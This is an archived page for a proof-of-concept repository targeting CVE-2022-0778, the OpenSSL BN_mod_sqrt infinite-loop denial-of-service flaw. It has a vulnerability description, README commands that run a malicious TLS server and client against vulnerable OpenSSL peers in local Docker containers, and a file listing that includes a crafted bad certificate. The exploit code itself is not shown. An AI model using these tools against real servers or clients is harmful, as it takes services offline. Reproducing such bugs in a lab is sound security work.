Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-0778 PoC — OpenSSL 安全漏洞

Source
https://github.com/yywing/cve-2022-0778
Associated Vulnerability
Title:OpenSSL 安全漏洞 (CVE-2022-0778)
Description:OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 OpenSSL1.0.2 版本、1.1.1版本和3.0版本存在安全漏洞,该漏洞源于计算模平方根的BN_mod_sqrt() 函数存在错误,可能导致对于非素数模数无线循环。攻击者可以发送特殊的函数参数值利用该漏洞导致应用在解析证书的过程中触发拒绝服务。
Readme
# cve-2022-0778

## bad server

```
go run server/main.go --addr 127.0.0.1:12345

cd test && test_server.sh

docker stat
```

## bad client

```
cd test && test_client.sh

go run client/main.go  --network tcp --addr 127.0.0.1:12345

docker stat
```

## build

```
docker build -t cve-2022-0778 .
```

## docker hub

```
# start vulned server
docker pull yywing/cve-2022-0778-target
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778-target python server.py
# attack
docker pull yywing/cve-2022-0778
docker run -it --rm --entrypoint badclient yywing/cve-2022-0778 --addr host.docker.internal:12345

# start bad server
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778 --addr 0.0.0.0:12345
# use vulned client
docker run -it --rm yywing/cve-2022-0778-target python -c "import http.client;http.client.HTTPSConnection('host.docker.internal', 12345).request('GET', '/')"
# or
docker run -it --rm yywing/cve-2022-0778-target curl https://host.docker.internal:12345
```
File Snapshot

 [4.0K]  /data/pocs/f288e6c14864bfe72d974e2ded35d37b12c656c1
├── [4.0K]  certfile
│   ├── [ 492]  badcert.der
│   ├── [ 206]  cert.go
│   ├── [1.2K]  server.crt
│   └── [1.6K]  server.key
├── [4.0K]  client
│   └── [1.0K]  main.go
├── [4.0K]  cpu
│   ├── [ 194]  cpu_386.go
│   ├── [ 196]  cpu_amd64.go
│   ├── [ 247]  cpu_arm64_android.go
│   ├── [ 967]  cpu_arm64_darwin.go
│   ├── [ 865]  cpu_arm64_freebsd.go
│   ├── [ 812]  cpu_arm64.go
│   ├── [2.0K]  cpu_arm64_hwcap.go
│   ├── [ 281]  cpu_arm64_linux.go
│   ├── [ 547]  cpu_arm64_other.go
│   ├── [ 439]  cpu_arm64.s
│   ├── [ 821]  cpu_arm.go
│   ├── [6.8K]  cpu.go
│   ├── [ 697]  cpu_mips64x.go
│   ├── [ 220]  cpu_mips.go
│   ├── [ 220]  cpu_mipsle.go
│   ├── [ 620]  cpu_no_name.go
│   ├── [ 485]  cpu_ppc64x_aix.go
│   ├── [ 505]  cpu_ppc64x.go
│   ├── [ 747]  cpu_ppc64x_linux.go
│   ├── [ 220]  cpu_riscv64.go
│   ├── [ 276]  cpu.s
│   ├── [5.9K]  cpu_s390x.go
│   ├── [2.2K]  cpu_s390x.s
│   ├── [1.4K]  cpu_s390x_test.go
│   ├── [ 220]  cpu_wasm.go
│   ├── [4.2K]  cpu_x86.go
│   ├── [ 600]  cpu_x86.s
│   └── [ 200]  export_test.go
├── [ 363]  Dockerfile
├── [ 167]  go.mod
├── [1.0K]  go.sum
├── [ 973]  README.md
├── [4.0K]  server
│   └── [1.2K]  main.go
├── [4.0K]  test
│   ├── [ 137]  Dockerfile
│   ├── [  22]  server.crt -> ../certfile/server.crt
│   ├── [  22]  server.key -> ../certfile/server.key
│   ├── [1.0K]  server.py
│   ├── [ 125]  test_clinet.sh
│   └── [ 158]  test_server.sh
└── [4.0K]  tls
    ├── [3.9K]  alert.go
    ├── [9.8K]  auth.go
    ├── [6.9K]  auth_test.go
    ├── [ 25K]  cipher_suites.go
    ├── [ 52K]  common.go
    ├── [3.3K]  common_string.go
    ├── [ 46K]  conn.go
    ├── [9.7K]  conn_test.go
    ├── [7.8K]  example_test.go
    ├── [4.9K]  generate_cert.go
    ├── [ 27K]  handshake_client.go
    ├── [ 77K]  handshake_client_test.go
    ├── [ 20K]  handshake_client_tls13.go
    ├── [ 45K]  handshake_messages.go
    ├── [ 13K]  handshake_messages_test.go
    ├── [ 24K]  handshake_server.go
    ├── [ 62K]  handshake_server_test.go
    ├── [ 25K]  handshake_server_tls13.go
    ├── [ 24K]  handshake_test.go
    ├── [ 470]  handshake_unix_test.go
    ├── [ 12K]  key_agreement.go
    ├── [5.9K]  key_schedule.go
    ├── [5.6K]  key_schedule_test.go
    ├── [2.4K]  link_test.go
    ├── [8.4K]  prf.go
    ├── [5.7K]  prf_test.go
    ├── [ 12K]  testdata
    │   ├── [ 10K]  Client-TLSv10-ClientCert-ECDSA-ECDSA
    │   ├── [ 10K]  Client-TLSv10-ClientCert-ECDSA-RSA
    │   ├── [8.3K]  Client-TLSv10-ClientCert-Ed25519
    │   ├── [10.0K]  Client-TLSv10-ClientCert-RSA-ECDSA
    │   ├── [ 10K]  Client-TLSv10-ClientCert-RSA-RSA
    │   ├── [6.8K]  Client-TLSv10-ECDHE-ECDSA-AES
    │   ├── [7.1K]  Client-TLSv10-ECDHE-RSA-AES
    │   ├── [   0]  Client-TLSv10-Ed25519
    │   ├── [7.1K]  Client-TLSv10-ExportKeyingMaterial
    │   ├── [6.2K]  Client-TLSv10-RSA-RC4
    │   ├── [6.9K]  Client-TLSv11-ECDHE-ECDSA-AES
    │   ├── [7.2K]  Client-TLSv11-ECDHE-RSA-AES
    │   ├── [   0]  Client-TLSv11-Ed25519
    │   ├── [6.2K]  Client-TLSv11-RSA-RC4
    │   ├── [6.4K]  Client-TLSv12-AES128-GCM-SHA256
    │   ├── [7.1K]  Client-TLSv12-AES128-SHA256
    │   ├── [6.4K]  Client-TLSv12-AES256-GCM-SHA384
    │   ├── [6.9K]  Client-TLSv12-ALPN
    │   ├── [6.7K]  Client-TLSv12-ALPN-NoMatch
    │   ├── [ 10K]  Client-TLSv12-ClientCert-ECDSA-ECDSA
    │   ├── [ 10K]  Client-TLSv12-ClientCert-ECDSA-RSA
    │   ├── [8.9K]  Client-TLSv12-ClientCert-Ed25519
    │   ├── [ 10K]  Client-TLSv12-ClientCert-RSA-AES256-GCM-SHA384
    │   ├── [ 10K]  Client-TLSv12-ClientCert-RSA-ECDSA
    │   ├── [ 10K]  Client-TLSv12-ClientCert-RSA-RSA
    │   ├── [ 10K]  Client-TLSv12-ClientCert-RSA-RSAPKCS1v15
    │   ├── [ 11K]  Client-TLSv12-ClientCert-RSA-RSAPSS
    │   ├── [6.9K]  Client-TLSv12-ECDHE-ECDSA-AES
    │   ├── [7.2K]  Client-TLSv12-ECDHE-ECDSA-AES128-SHA256
    │   ├── [6.5K]  Client-TLSv12-ECDHE-ECDSA-AES256-GCM-SHA384
    │   ├── [6.5K]  Client-TLSv12-ECDHE-ECDSA-AES-GCM
    │   ├── [6.2K]  Client-TLSv12-ECDHE-ECDSA-CHACHA20-POLY1305
    │   ├── [7.2K]  Client-TLSv12-ECDHE-RSA-AES
    │   ├── [7.5K]  Client-TLSv12-ECDHE-RSA-AES128-SHA256
    │   ├── [6.5K]  Client-TLSv12-ECDHE-RSA-CHACHA20-POLY1305
    │   ├── [5.0K]  Client-TLSv12-Ed25519
    │   ├── [6.7K]  Client-TLSv12-ExportKeyingMaterial
    │   ├── [7.3K]  Client-TLSv12-P256-ECDHE
    │   ├── [ 18K]  Client-TLSv12-RenegotiateOnce
    │   ├── [ 26K]  Client-TLSv12-RenegotiateTwice
    │   ├── [ 18K]  Client-TLSv12-RenegotiateTwiceRejected
    │   ├── [7.0K]  Client-TLSv12-RenegotiationRejected
    │   ├── [6.2K]  Client-TLSv12-RSA-RC4
    │   ├── [8.4K]  Client-TLSv12-SCT
    │   ├── [6.8K]  Client-TLSv12-X25519-ECDHE
    │   ├── [6.8K]  Client-TLSv13-AES128-SHA256
    │   ├── [6.9K]  Client-TLSv13-AES256-SHA384
    │   ├── [7.0K]  Client-TLSv13-ALPN
    │   ├── [6.8K]  Client-TLSv13-CHACHA20-SHA256
    │   ├── [ 11K]  Client-TLSv13-ClientCert-ECDSA-RSA
    │   ├── [9.2K]  Client-TLSv13-ClientCert-Ed25519
    │   ├── [ 10K]  Client-TLSv13-ClientCert-RSA-ECDSA
    │   ├── [ 11K]  Client-TLSv13-ClientCert-RSA-RSAPSS
    │   ├── [6.5K]  Client-TLSv13-ECDSA
    │   ├── [5.1K]  Client-TLSv13-Ed25519
    │   ├── [6.8K]  Client-TLSv13-ExportKeyingMaterial
    │   ├── [8.9K]  Client-TLSv13-HelloRetryRequest
    │   ├── [7.5K]  Client-TLSv13-KeyUpdate
    │   ├── [7.1K]  Client-TLSv13-P256-ECDHE
    │   ├── [6.8K]  Client-TLSv13-X25519-ECDHE
    │   ├── [ 587]  example-cert.pem
    │   ├── [ 227]  example-key.pem
    │   ├── [5.9K]  Server-TLSv10-ECDHE-ECDSA-AES
    │   ├── [7.0K]  Server-TLSv10-ExportKeyingMaterial
    │   ├── [5.6K]  Server-TLSv10-RSA-3DES
    │   ├── [5.9K]  Server-TLSv10-RSA-AES
    │   ├── [5.4K]  Server-TLSv10-RSA-RC4
    │   ├── [ 758]  Server-TLSv11-FallbackSCSV
    │   ├── [5.4K]  Server-TLSv11-RSA-RC4
    │   ├── [6.9K]  Server-TLSv12-ALPN
    │   ├── [6.8K]  Server-TLSv12-ALPN-Fallback
    │   ├── [ 985]  Server-TLSv12-ALPN-NoMatch
    │   ├── [6.8K]  Server-TLSv12-ALPN-NotConfigured
    │   ├── [9.5K]  Server-TLSv12-ClientAuthRequestedAndECDSAGiven
    │   ├── [8.2K]  Server-TLSv12-ClientAuthRequestedAndEd25519Given
    │   ├── [9.4K]  Server-TLSv12-ClientAuthRequestedAndGiven
    │   ├── [9.4K]  Server-TLSv12-ClientAuthRequestedAndPKCS1v15Given
    │   ├── [6.3K]  Server-TLSv12-ClientAuthRequestedNotGiven
    │   ├── [6.3K]  Server-TLSv12-ECDHE-ECDSA-AES
    │   ├── [4.2K]  Server-TLSv12-Ed25519
    │   ├── [6.6K]  Server-TLSv12-ExportKeyingMaterial
    │   ├── [6.8K]  Server-TLSv12-IssueTicket
    │   ├── [6.8K]  Server-TLSv12-IssueTicketPreDisable
    │   ├── [6.4K]  Server-TLSv12-P256
    │   ├── [3.3K]  Server-TLSv12-Resume
    │   ├── [6.8K]  Server-TLSv12-ResumeDisabled
    │   ├── [5.9K]  Server-TLSv12-RSA-3DES
    │   ├── [6.3K]  Server-TLSv12-RSA-AES
    │   ├── [6.1K]  Server-TLSv12-RSA-AES256-GCM-SHA384
    │   ├── [6.1K]  Server-TLSv12-RSA-AES-GCM
    │   ├── [5.6K]  Server-TLSv12-RSA-RC4
    │   ├── [5.7K]  Server-TLSv12-RSA-RSAPKCS1v15
    │   ├── [5.7K]  Server-TLSv12-RSA-RSAPSS
    │   ├── [6.3K]  Server-TLSv12-SNI
    │   ├── [6.3K]  Server-TLSv12-SNI-GetCertificate
    │   ├── [6.3K]  Server-TLSv12-SNI-GetCertificateNotFound
    │   ├── [6.1K]  Server-TLSv12-X25519
    │   ├── [7.5K]  Server-TLSv13-AES128-SHA256
    │   ├── [7.7K]  Server-TLSv13-AES256-SHA384
    │   ├── [7.5K]  Server-TLSv13-ALPN
    │   ├── [7.5K]  Server-TLSv13-ALPN-Fallback
    │   ├── [2.0K]  Server-TLSv13-ALPN-NoMatch
    │   ├── [7.5K]  Server-TLSv13-ALPN-NotConfigured
    │   ├── [7.5K]  Server-TLSv13-CHACHA20-SHA256
    │   ├── [ 14K]  Server-TLSv13-ClientAuthRequestedAndECDSAGiven
    │   ├── [ 11K]  Server-TLSv13-ClientAuthRequestedAndEd25519Given
    │   ├── [ 13K]  Server-TLSv13-ClientAuthRequestedAndGiven
    │   ├── [7.8K]  Server-TLSv13-ClientAuthRequestedNotGiven
    │   ├── [7.2K]  Server-TLSv13-ECDHE-ECDSA-AES
    │   ├── [5.7K]  Server-TLSv13-Ed25519
    │   ├── [7.4K]  Server-TLSv13-ExportKeyingMaterial
    │   ├── [9.2K]  Server-TLSv13-HelloRetryRequest
    │   ├── [7.4K]  Server-TLSv13-IssueTicket
    │   ├── [7.4K]  Server-TLSv13-IssueTicketPreDisable
    │   ├── [7.7K]  Server-TLSv13-P256
    │   ├── [4.4K]  Server-TLSv13-Resume
    │   ├── [7.4K]  Server-TLSv13-ResumeDisabled
    │   ├── [7.1K]  Server-TLSv13-Resume-HelloRetryRequest
    │   ├── [7.3K]  Server-TLSv13-RSA-RSAPSS
    │   ├── [1.0K]  Server-TLSv13-RSA-RSAPSS-TooSmall
    │   └── [7.3K]  Server-TLSv13-X25519
    ├── [5.2K]  ticket.go
    ├── [ 12K]  tls.go
    └── [ 47K]  tls_test.go

7 directories, 194 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.